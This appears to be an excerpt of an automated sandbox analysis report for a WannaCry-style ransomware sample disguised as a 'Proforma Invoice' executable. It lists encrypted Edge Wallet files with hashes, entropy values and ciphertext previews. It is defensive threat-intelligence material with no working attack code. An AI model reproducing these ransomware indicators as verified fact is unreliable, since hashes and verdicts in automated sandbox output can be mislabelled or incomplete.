                                                          Preview:WANACRY!.....+q...3..C.@.l...q"u......7R4....D..r...+...I..$...P.......J....bY........P.W...K..Oo......>..-.u.....?..E.}j1...Q..!.T39z.w.|.l....=%-.....,..8.49..9..I..0..B.......l........|....|..*...W.o..I....F.m.+s6&..vF...79...'.../...f...}.`-...T..u.%....$?......GJD....K.J8c'={S.......z..f..u....Qe......._.+.V.|...!.y..e.....R]t..&..?.q..f.....x.:.:.....4.*..WM..='t..[.da,w\..2..l.(...=_.......k...n..3g~.c1..jS0.%.N..i.0.J...0...m.(.i.~.K......`.@`......gz"\....].!..i..$#U]Op .=..P.K.......(/a.6.....T..].X~...m...~..>l..<..Q...3.i....4....M.4QW.........[ws25.=.JNR;h....*]....i..1\.A.3&<j@( 1..3.^.?c.H.^e.DxuBW...9.f.T.vr..i...k.#..4.5|>..I...g.)\._.-e.l....d=..QN.g...[.a..(.#.....&.,....m.....=<y..|c......;/..E.9....a..,GCPY....TTQI..m.'...?/>.R....R........i+I..8...g..E*..+s....jL.?._...x.g+.@.m........*fI.;..72.\)...p(-.>^...v).[...f..6.;..8.N....0...=d.....y..i.C.j..aa&.a.._4....Yb+q/$...A.....FX!.....G."N........C+(D..h}.g.

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Wallet-Checkout\load-ec-i18n.bundle.js.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):16456
                                                          Entropy (8bit):7.9883821885952955
                                                          Encrypted:false
                                                          SSDEEP:384:5LX5z7uTtgv9gh1tQSV9/zT+K4Hs9LhX6wAW:pX5zytM9gh1Ks579I1W
                                                          MD5:D785B6C7E5E910667517CED426221AF4
                                                          SHA1:2B8C50FCEF9D3A588DC812A963642E3BF8E17759
                                                          SHA-256:AAE4CA699F297A43828907652A62941E55BF313070304B38FA2B3D5158B3ADE2
                                                          SHA-512:3A5C2A2AA4C810B547BC70BA15CCBC00A193ED22CC56DE03CABB2322E05017F0BFFF4D3DCC351B9E37F4D492EFEB7BF1493AF99BFFAFFFB24C77A45FEA5936ED
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....+q...3..C.@.l...q"u......7R4....D..r...+...I..$...P.......J....bY........P.W...K..Oo......>..-.u.....?..E.}j1...Q..!.T39z.w.|.l....=%-.....,..8.49..9..I..0..B.......l........|....|..*...W.o..I....F.m.+s6&..vF...79...'.../...f...}.`-...T..u.%....$?......GJD....K.J8c'={S.......z..f..u....Qe......._.+.V.|...!.y..e.....R]t..&..?.q..f.....x.:.:.....4.*..WM..='t..[.da,w\..2..l.(...=_.......k...n..3g~.c1..jS0.%.N..i.0.J...0...m.(.i.~.K......`.@`......gz"\....].!..i..$#U]Op .=..P.K.......(/a.6.....T..].X~...m...~..>l..<..Q...3.i....4....M.4QW.........[ws25.=.JNR;h....*]....i..1\.A.3&<j@( 1..3.^.?c.H.^e.DxuBW...9.f.T.vr..i...k.#..4.5|>..I...g.)\._.-e.l....d=..QN.g...[.a..(.#.....&.,....m.....=<y..|c......;/..E.9....a..,GCPY....TTQI..m.'...?/>.R....R........i+I..8...g..E*..+s....jL.?._...x.g+.@.m........*fI.;..72.\)...p(-.>^...v).[...f..6.;..8.N....0...=d.....y..i.C.j..aa&.a.._4....Yb+q/$...A.....FX!.....G."N........C+(D..h}.g.

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Wallet-Checkout\wallet-drawer.bundle.js.LICENSE.txt.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2088
                                                          Entropy (8bit):7.911427253178882
                                                          Encrypted:false
                                                          SSDEEP:48:bkJ3CpBI6LFq1mg/7V0DCVymLoAcU8kOb7NkaTzy2gnE:oyBISKJ0Di/Rc5kQpu2kE
                                                          MD5:8F42186073B96E047B7E2088847E88AE
                                                          SHA1:E3B54B9F74E5076A637800D05EB80F9597493425
                                                          SHA-256:A69F54CBD552D95483310610A58BFDE2A2274EFCE26BE5930F11475C132FC78E
                                                          SHA-512:49C7FFA53484A070805519813292D44AF4FDEF38DA8FC609C3C046938595EF05A4CFDA7D69CA0DE3BDAF8E53A715541B0783B7613EA3F2230D1B19CF25D23A62
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....Id.].....7...C5".hE..+S..f...2.&bv..r{`.C.%s...d.\..C...@..d....e4.,R.T....q..F...&..2...S.....h.E..C.`}..yx..*.I......bH]...jm.wd..{..PV.dH.....X._.F>.(=.N>....;.....~.A.h.5BJ.7...1<*H.n/.{./.7Pg....&..Ad.,s...f.x..l...$G7.~..3(.`.8.L....].<o..................M.....>........}............wb...wGF.c....;.Rb_W`.D/.r.c-.Kv...pD].{.s3......S.\.....s`.H..g..|.g!.fY....". .qs"..\....T....?+l..lO2A.(S...BP;.1GK'....z..q.....t...x.2.6.".s .....,.f~s..D.}....=..g.pA7E."`..Y.D.....T..8...D.,.....m.,....\..d...3..8.g<.=.B..?..;..f+..R..IQ.....#.P...4J./..y_V.(...e.v{~...s..KU...e.j..(...._ 9V.!.#......U.......)aM..k/....w;....K4.#...k...h*.$.#.@..,..L.7.PK.J].l7d...5"..A..=......C...^.b...+..U...8......k..is..R.R.........V..........!>.vAq...R...t.#..AwZ=f..f.E.vM$;m'R.5.D..Gx.2..S`..2,O*.U?iU.O?....l.....<..... ... .....s}...6d..e}...')...B7.tn...J.f..E+.x..I.Qj...u..(.+.w.#.e,.r.{..b.$.z)....*Y.6..a.r..d.0.&k..W..u..^...s..LL..[J!..^...

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Wallet-Checkout\wallet-drawer.bundle.js.LICENSE.txt.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2088
                                                          Entropy (8bit):7.911427253178882
                                                          Encrypted:false
                                                          SSDEEP:48:bkJ3CpBI6LFq1mg/7V0DCVymLoAcU8kOb7NkaTzy2gnE:oyBISKJ0Di/Rc5kQpu2kE
                                                          MD5:8F42186073B96E047B7E2088847E88AE
                                                          SHA1:E3B54B9F74E5076A637800D05EB80F9597493425
                                                          SHA-256:A69F54CBD552D95483310610A58BFDE2A2274EFCE26BE5930F11475C132FC78E
                                                          SHA-512:49C7FFA53484A070805519813292D44AF4FDEF38DA8FC609C3C046938595EF05A4CFDA7D69CA0DE3BDAF8E53A715541B0783B7613EA3F2230D1B19CF25D23A62
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....Id.].....7...C5".hE..+S..f...2.&bv..r{`.C.%s...d.\..C...@..d....e4.,R.T....q..F...&..2...S.....h.E..C.`}..yx..*.I......bH]...jm.wd..{..PV.dH.....X._.F>.(=.N>....;.....~.A.h.5BJ.7...1<*H.n/.{./.7Pg....&..Ad.,s...f.x..l...$G7.~..3(.`.8.L....].<o..................M.....>........}............wb...wGF.c....;.Rb_W`.D/.r.c-.Kv...pD].{.s3......S.\.....s`.H..g..|.g!.fY....". .qs"..\....T....?+l..lO2A.(S...BP;.1GK'....z..q.....t...x.2.6.".s .....,.f~s..D.}....=..g.pA7E."`..Y.D.....T..8...D.,.....m.,....\..d...3..8.g<.=.B..?..;..f+..R..IQ.....#.P...4J./..y_V.(...e.v{~...s..KU...e.j..(...._ 9V.!.#......U.......)aM..k/....w;....K4.#...k...h*.$.#.@..,..L.7.PK.J].l7d...5"..A..=......C...^.b...+..U...8......k..is..R.R.........V..........!>.vAq...R...t.#..AwZ=f..f.E.vM$;m'R.5.D..Gx.2..S`..2,O*.U?iU.O?....l.....<..... ... .....s}...6d..e}...')...B7.tn...J.f..E+.x..I.Qj...u..(.+.w.#.e,.r.{..b.$.z)....*Y.6..a.r..d.0.&k..W..u..^...s..LL..[J!..^...

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Wallet-Checkout\wallet-drawer.bundle.js.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1394952
                                                          Entropy (8bit):7.999861487038997
                                                          Encrypted:true
                                                          SSDEEP:24576:Xp4ZGx+736WzHmnyBB5qsprD0viTJYXodKDLz0HYJ+Cb+M0:5IGx+z6AoyJqsVJtYXgyz0HYUCb+1
                                                          MD5:59029487374E6304AE2D4D82DCF2CFFB
                                                          SHA1:77C1F5E2B147BDE92D5D51660F4FC9B5F545FEB5
                                                          SHA-256:7E52C1638E0A6C3BC46A3B04B26CE5F85873A89F5DA997A2D4EE24EEFCF5ED9E
                                                          SHA-512:E770E21827F6BB733190676211871910964899FD3D04F1EE2312EE2518B89F725071AC0632750B4E92E6D7D93CE969DF74994E3CF5B402E66FDF5F44D669B47C
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!......&.FkE..z...H.L-6....p..c.Wf...C...F8...rF....<.0....x....Kf....d?&u .......U+n....XO..uO./..Ko?C.J6M..'..K.D..2Rs....|d?..e.l...s....Y.v+.(.w1.d(..93...x^..M\h9YK.cN87..;vP>.c.!.E.yg...FQ....<....:.^...RHz.qx..N.......4...D".g.b/%.........>k..6.o......G........y.....:k.i$.b..p..^..m<...v..o..KOI..Xz........PY....z...HR..JD..D.....[..Up:...:.g.N...{Y..U..._...3...@..{........=..]..C..%c...9H..g..V..Q.l..tC...=..^$>+M^Le.*F...B^./.rJ.{..2.T...<c.E..tR\80..c.....2..9.q.M+1...A..X.;...g.-.m..v=.<....r..KUR...R('.......Z%.......6..A........$V]....$.P.+Fk!r3.. ..l.rqK./..R...$z.....+{..>0.J....j`.l#V...."h.UYC] .1+....=:..<./.).W....p8..c..].x.P........8g....<....i..[...(j..3hiH}5n..70....%e.x..w8@k.Ex....Z>...U...i..2/.(....G(....M~C./T....#Q...Q....D...|.i....(:..%..x9m.f.B..w..+...h.q3. ...!.z{YS.5.`..L,[..r&...\7.j[..&.hS.~.Q...._...c)..............9z.ux......q...yK...V..v}.....4~.OZ.....7j{.9...-v...x:........":=....Y5'"Tn.[.

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Wallet-Checkout\wallet-drawer.bundle.js.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1394952
                                                          Entropy (8bit):7.999861487038997
                                                          Encrypted:true
                                                          SSDEEP:24576:Xp4ZGx+736WzHmnyBB5qsprD0viTJYXodKDLz0HYJ+Cb+M0:5IGx+z6AoyJqsVJtYXgyz0HYUCb+1
                                                          MD5:59029487374E6304AE2D4D82DCF2CFFB
                                                          SHA1:77C1F5E2B147BDE92D5D51660F4FC9B5F545FEB5
                                                          SHA-256:7E52C1638E0A6C3BC46A3B04B26CE5F85873A89F5DA997A2D4EE24EEFCF5ED9E
                                                          SHA-512:E770E21827F6BB733190676211871910964899FD3D04F1EE2312EE2518B89F725071AC0632750B4E92E6D7D93CE969DF74994E3CF5B402E66FDF5F44D669B47C
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!......&.FkE..z...H.L-6....p..c.Wf...C...F8...rF....<.0....x....Kf....d?&u .......U+n....XO..uO./..Ko?C.J6M..'..K.D..2Rs....|d?..e.l...s....Y.v+.(.w1.d(..93...x^..M\h9YK.cN87..;vP>.c.!.E.yg...FQ....<....:.^...RHz.qx..N.......4...D".g.b/%.........>k..6.o......G........y.....:k.i$.b..p..^..m<...v..o..KOI..Xz........PY....z...HR..JD..D.....[..Up:...:.g.N...{Y..U..._...3...@..{........=..]..C..%c...9H..g..V..Q.l..tC...=..^$>+M^Le.*F...B^./.rJ.{..2.T...<c.E..tR\80..c.....2..9.q.M+1...A..X.;...g.-.m..v=.<....r..KUR...R('.......Z%.......6..A........$V]....$.P.+Fk!r3.. ..l.rqK./..R...$z.....+{..>0.J....j`.l#V...."h.UYC] .1+....=:..<./.).W....p8..c..].x.P........8g....<....i..[...(j..3hiH}5n..70....%e.x..w8@k.Ex....Z>...U...i..2/.(....G(....M~C./T....#Q...Q....D...|.i....(:..%..x9m.f.B..w..+...h.q3. ...!.z{YS.5.`..L,[..r&...\7.j[..&.hS.~.Q...._...c)..............9z.ux......q...yK...V..v}.....4~.OZ.....7j{.9...-v...x:........":=....Y5'"Tn.[.

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\app-setup.js.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):488
                                                          Entropy (8bit):7.512172348034761
                                                          Encrypted:false
                                                          SSDEEP:12:bkELC/4SnE68NVfmRjRpCGMF6N5yU+w8l6GN6lUGjNJgn:bkVnE6Gtyt8DUpGNOnjbgn
                                                          MD5:0BCB9C9B8CE54E562D66804440775941
                                                          SHA1:CE4FEB3735E9AB21926EE427E6F4E440634B99ED
                                                          SHA-256:16F4383ACCE97065D13EFC9B7343B3ECD8D0219920B842B448280D682BA87D10
                                                          SHA-512:6F2569F4566DC61A23093286D23356140A7B4172142C3E3674E95C5DEF9DBFD8FA041A4DA0BFEA1F8B08B6BAA8B4205EC497690356A1146A186F98E1D3598F64
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!......u...slR.(..P.K......L...N...L..+Sp.4...r`..5v+..lW^..r.M...\~...F.D'.:.5............F..O.2...$ B3.....G.n.w.N..5.41.....,?h..n..M.. ./....d0..gb.@..N....]..I..EUz2..+._52j..(.q.\.l...a......,7i..T[.dr....pL.5R....I..z...M..Ju...t ...nL...Nt...................z.F.......c.,<.v>xE...Z..[&...z.2.<..7*.... K...mv..s.*.V]...B`...%...jb..uN.E...2.sC.1........Q.Y...v.....).:..G*....Z.=.B...H.<4.K7(.]y..+7..H.{I.....Kd.J.c.%...Js.....{|..b0..37g....'....Pl..

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\app-setup.js.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):488
                                                          Entropy (8bit):7.512172348034761
                                                          Encrypted:false
                                                          SSDEEP:12:bkELC/4SnE68NVfmRjRpCGMF6N5yU+w8l6GN6lUGjNJgn:bkVnE6Gtyt8DUpGNOnjbgn
                                                          MD5:0BCB9C9B8CE54E562D66804440775941
                                                          SHA1:CE4FEB3735E9AB21926EE427E6F4E440634B99ED
                                                          SHA-256:16F4383ACCE97065D13EFC9B7343B3ECD8D0219920B842B448280D682BA87D10
                                                          SHA-512:6F2569F4566DC61A23093286D23356140A7B4172142C3E3674E95C5DEF9DBFD8FA041A4DA0BFEA1F8B08B6BAA8B4205EC497690356A1146A186F98E1D3598F64
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!......u...slR.(..P.K......L...N...L..+Sp.4...r`..5v+..lW^..r.M...\~...F.D'.:.5............F..O.2...$ B3.....G.n.w.N..5.41.....,?h..n..M.. ./....d0..gb.@..N....]..I..EUz2..+._52j..(.q.\.l...a......,7i..T[.dr....pL.5R....I..z...M..Ju...t ...nL...Nt...................z.F.......c.,<.v>xE...Z..[&...z.2.<..7*.... K...mv..s.*.V]...B`...%...jb..uN.E...2.sC.1........Q.Y...v.....).:..G*....Z.=.B...H.<4.K7(.]y..+7..H.{I.....Kd.J.c.%...Js.....{|..b0..37g....'....Pl..

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\bnpl\bnpl.bundle.js.LICENSE.txt.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2040
                                                          Entropy (8bit):7.901243104689633
                                                          Encrypted:false
                                                          SSDEEP:48:bkUWPU5lq8IEFrNpD3/cUefr3+ZgGYaONm35NqciZPZ:oDPU7q8IMpDcU23+aKOEpNU
                                                          MD5:78B67D32F4C56543672EFBADEDA91260
                                                          SHA1:8832510D69E8750A46DD907181140AF6A5B55748
                                                          SHA-256:BCBCA181D66299540D087F8FB692FF8AFB3444FF7BF5DF97C3467E752E3C4CA9
                                                          SHA-512:2F75A2EB9D293D67A7A0B49F3174892AE26CDCD2AC22A015100E0669AA21422A1E765B59B4CE22D79F15B2D7CF19DACFCF0B05D78C251F56F9C1E7B22635A080
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....t.....W[iz....O?..j...,.V.ZnWr....~%.pQ+.:.(..A].....5?.!...vI%.<.O..Lb..4....IC ..4iY...s...P..$..2..........b|....G.......t.*._......R....\.4VI1B.R..t.[X..,.M.[.="../.@.P.2...'..........].*cy.q...]...tJw......T...Td$.\...........Ng(.)f.................}...]#.U:q.q...0..`..t..{.w3>X.e..'L.....j.y.w.$.#...7......?].X..=mB;0..........0...O...$z...w...J._.........8.&Oy.6...a....R1.Cx...6.o.?T'...RKJ.j..N._.r>..Z..;.&..;:E0.@.`A.#.9....B....{q..^<.....@......u+.UopI.{...%1~6...lY..B.....c.....>.Q..=..$.I..~WIDw.L.....e._.T.U.J..i.. [...V.D.3..P.C>..~..Nt.#r..i.N..^.p-......WLD...gS.k.4.Q]H...}..r..zE..JD..Q..J.W.>.....c..o..w...|Z.....f........@...o!..^j)......E....g...sp..LN..uZ[.....F.........q.=4S..........~u..B.?o..IT.,.......<kp..:u.....\J.....F$8v...;.~i....L.3...$..4$...<..w...#8kv...DwIm...s.5n..k..0.+N.o...Z.W...q......R....'..2wV8.......6!aD..v......fz.{......G..M1../b...vl:..-...G..........C..L.y..|...n. ...cD

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\bnpl\bnpl.bundle.js.LICENSE.txt.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2040
                                                          Entropy (8bit):7.901243104689633
                                                          Encrypted:false
                                                          SSDEEP:48:bkUWPU5lq8IEFrNpD3/cUefr3+ZgGYaONm35NqciZPZ:oDPU7q8IMpDcU23+aKOEpNU
                                                          MD5:78B67D32F4C56543672EFBADEDA91260
                                                          SHA1:8832510D69E8750A46DD907181140AF6A5B55748
                                                          SHA-256:BCBCA181D66299540D087F8FB692FF8AFB3444FF7BF5DF97C3467E752E3C4CA9
                                                          SHA-512:2F75A2EB9D293D67A7A0B49F3174892AE26CDCD2AC22A015100E0669AA21422A1E765B59B4CE22D79F15B2D7CF19DACFCF0B05D78C251F56F9C1E7B22635A080
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....t.....W[iz....O?..j...,.V.ZnWr....~%.pQ+.:.(..A].....5?.!...vI%.<.O..Lb..4....IC ..4iY...s...P..$..2..........b|....G.......t.*._......R....\.4VI1B.R..t.[X..,.M.[.="../.@.P.2...'..........].*cy.q...]...tJw......T...Td$.\...........Ng(.)f.................}...]#.U:q.q...0..`..t..{.w3>X.e..'L.....j.y.w.$.#...7......?].X..=mB;0..........0...O...$z...w...J._.........8.&Oy.6...a....R1.Cx...6.o.?T'...RKJ.j..N._.r>..Z..;.&..;:E0.@.`A.#.9....B....{q..^<.....@......u+.UopI.{...%1~6...lY..B.....c.....>.Q..=..$.I..~WIDw.L.....e._.T.U.J..i.. [...V.D.3..P.C>..~..Nt.#r..i.N..^.p-......WLD...gS.k.4.Q]H...}..r..zE..JD..Q..J.W.>.....c..o..w...|Z.....f........@...o!..^j)......E....g...sp..LN..uZ[.....F.........q.=4S..........~u..B.?o..IT.,.......<kp..:u.....\J.....F$8v...;.~i....L.3...$..4$...<..w...#8kv...DwIm...s.5n..k..0.+N.o...Z.W...q......R....'..2wV8.......6!aD..v......fz.{......G..M1../b...vl:..-...G..........C..L.y..|...n. ...cD

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\bnpl\bnpl.bundle.js.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):843176
                                                          Entropy (8bit):7.999788634715214
                                                          Encrypted:true
                                                          SSDEEP:12288:n8FV+gDrkEfLDJHpO90B9mC3neXU/nX8VDuGcplmFwD:n+cqrkEfLFHpO9u3eM8VDuGemc
                                                          MD5:2F03DA0645E21B2CD1B904736642F3B5
                                                          SHA1:C832942CB5EA2E32C01C0C09FB7369530FD2D48F
                                                          SHA-256:A41F3961CAD24D324957A12B5B90619D86DBA9C62DB218DEB8CBB8956589640F
                                                          SHA-512:F71BE940A0E7EF2C8A6A2CAE1436C655B1CC93C757EB11C903D1889FEEB4654E80CC6F99C8CE13292EC772BD5B1588544530A86BBC92A9C39F0267E5857919FC
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....L.*&FX...%,.F....W.r.K...^M..G!..K....6o..l....O.6.(...8.!..g].....g..Y2..al....i.o....6.,...'.TFp!y.:...c...;^.s98.....S...W...k..<sbK...B..Q6.\L...R.....%.3..g..|..io`.d..=..{..r...E...Y..%...~%_.N.(..U=..@....(..A.}q.......`X.D.e.....~A...K..............B2!..R...t...{VE./..E../..@....};a.5.r\Y.P$f...Y.Y....T .gU.\...7.,qqL5e ....><..@...o..H].r......[.\/s3CN`..4b.8..D...t...Z.S.].u...p.7a..>...DX,..P..9...$..O.U.... .AQ..#./..q..!.(..L.KB...5..h....Y.[.......;.C|..U..f.hY......z.......u..%.6..$..k.j..O.%.."....].,E..u.5f @..T#.?........9.....H..*.+.e.Z...PPde...h............\xhx....k...~C...g7..K...o.M.T..5i3..>.|.(.@.z... ..5:.Np......^..h\.[}2..8.4$....-...Yvfm...N.1.b..c... .F.P..#3(..a.<@...0.s..w/..U...[>.:Y."..Sv...}.a.-[..1 ...Z.VrL]..b..r.L..^%i..UH.............Z.l.[. m.X.D'.:.{....k.T^.......U.n.|..!0|..........m.J....f.T}...6..lx.~..RC.r;6...x.$....J.6J.r.....2 Y.8...[.c.hP.... ...t.r.;q.i.EV|....B........S+!....`

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\bnpl\bnpl.bundle.js.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):843176
                                                          Entropy (8bit):7.999788634715214
                                                          Encrypted:true
                                                          SSDEEP:12288:n8FV+gDrkEfLDJHpO90B9mC3neXU/nX8VDuGcplmFwD:n+cqrkEfLFHpO9u3eM8VDuGemc
                                                          MD5:2F03DA0645E21B2CD1B904736642F3B5
                                                          SHA1:C832942CB5EA2E32C01C0C09FB7369530FD2D48F
                                                          SHA-256:A41F3961CAD24D324957A12B5B90619D86DBA9C62DB218DEB8CBB8956589640F
                                                          SHA-512:F71BE940A0E7EF2C8A6A2CAE1436C655B1CC93C757EB11C903D1889FEEB4654E80CC6F99C8CE13292EC772BD5B1588544530A86BBC92A9C39F0267E5857919FC
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....L.*&FX...%,.F....W.r.K...^M..G!..K....6o..l....O.6.(...8.!..g].....g..Y2..al....i.o....6.,...'.TFp!y.:...c...;^.s98.....S...W...k..<sbK...B..Q6.\L...R.....%.3..g..|..io`.d..=..{..r...E...Y..%...~%_.N.(..U=..@....(..A.}q.......`X.D.e.....~A...K..............B2!..R...t...{VE./..E../..@....};a.5.r\Y.P$f...Y.Y....T .gU.\...7.,qqL5e ....><..@...o..H].r......[.\/s3CN`..4b.8..D...t...Z.S.].u...p.7a..>...DX,..P..9...$..O.U.... .AQ..#./..q..!.(..L.KB...5..h....Y.[.......;.C|..U..f.hY......z.......u..%.6..$..k.j..O.%.."....].,E..u.5f @..T#.?........9.....H..*.+.e.Z...PPde...h............\xhx....k...~C...g7..K...o.M.T..5i3..>.|.(.@.z... ..5:.Np......^..h\.[}2..8.4$....-...Yvfm...N.1.b..c... .F.P..#3(..a.<@...0.s..w/..U...[>.:Y."..Sv...}.a.-[..1 ...Z.VrL]..b..r.L..^%i..UH.............Z.l.[. m.X.D'.:.{....k.T^.......U.n.|..!0|..........m.J....f.T}...6..lx.~..RC.r;6...x.$....J.6J.r.....2 Y.8...[.c.hP.... ...t.r.;q.i.EV|....B........S+!....`

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\bnpl_driver.js.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):11832
                                                          Entropy (8bit):7.984960513403079
                                                          Encrypted:false
                                                          SSDEEP:192:w70UPbN9uvTQIIKVhbZqZVsTdSEcCzsSOz7VDKJbVrDK59fU9Gf217e7krS3vbj1:w70ub0bIEhbZpRSPCoSE2Vy/U4ulcxz5
                                                          MD5:79AC7C67A8FCA2C70C1AD74DD7F5A6F9
                                                          SHA1:E2DABDEEAAEE1EC1288DC59661AED1197BB8B36F
                                                          SHA-256:551FD4F9F94582A092C2149D46FAD0554689D74417315C15CFE55747903BDF64
                                                          SHA-512:885E78D5FC6803B0417385B5D44CAA1B718F49EC06D53D77C8C432768D4707233DC3F1F0CE929007550301E22FD685750A1279132F6F029DBF074E52450E8C9C
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.........t...%l.{.FWM.r..m.%h.S.~.....9.k]....C\D..D....b.,..4=E.8..a..-U.z..i.x....w{z^...8..O....T.h.-:.w..;l...<...\./{&..K .......mvi..D..G...T.D.....QA4.AZ....b4L.y{....H3.n@..#C.P............9...V|..O..9..g...._ ;7.D..1.t...Y.V..C..z.....I.x.l.G........-......... .Ot...b.w....yA..E...G..Duts:Z..g......;....w3..of...z.=.$...F. ....8.c...P..("n{c..AI...T..!.u..)$.A...tx]l.t.......g`....u..9z4../......<.Dh]..~..K..c~...<.$.....OR.g...w..)nt.......L...1'..3.n...\...B.E.1...*"I.6.qu.4...C.f...........+..y.J..r.....G.."....VL..U....=.elh..+`O."SH.9...W.e:k83W.&u...k....~....}.w..S.Y*./....C^..<....Y ./,U.......&4..+.z.,.F.dK.>..qQ....o.g,....g}.o]X....dN..tD..&....v......B..;H.i..Us...........V.B..!.7...x..T...@..=<...U..Y.~.f..&.AP."4.......:D....08.=bP....BpM..>.......#%U=C...R.^O.rS.;..w...=.........`.B.~|.....Bt..j.K.I.Ooi......c....13.j.D.$.0......dun...x.{.o<n..)/.]S......k..Z.....d....NX..T{R.........3!.Z.....3..oL...3......q

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\bnpl_driver.js.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):11832
                                                          Entropy (8bit):7.984960513403079
                                                          Encrypted:false
                                                          SSDEEP:192:w70UPbN9uvTQIIKVhbZqZVsTdSEcCzsSOz7VDKJbVrDK59fU9Gf217e7krS3vbj1:w70ub0bIEhbZpRSPCoSE2Vy/U4ulcxz5
                                                          MD5:79AC7C67A8FCA2C70C1AD74DD7F5A6F9
                                                          SHA1:E2DABDEEAAEE1EC1288DC59661AED1197BB8B36F
                                                          SHA-256:551FD4F9F94582A092C2149D46FAD0554689D74417315C15CFE55747903BDF64
                                                          SHA-512:885E78D5FC6803B0417385B5D44CAA1B718F49EC06D53D77C8C432768D4707233DC3F1F0CE929007550301E22FD685750A1279132F6F029DBF074E52450E8C9C
                                                          Malicious:false
                                                          Reputation:unknown
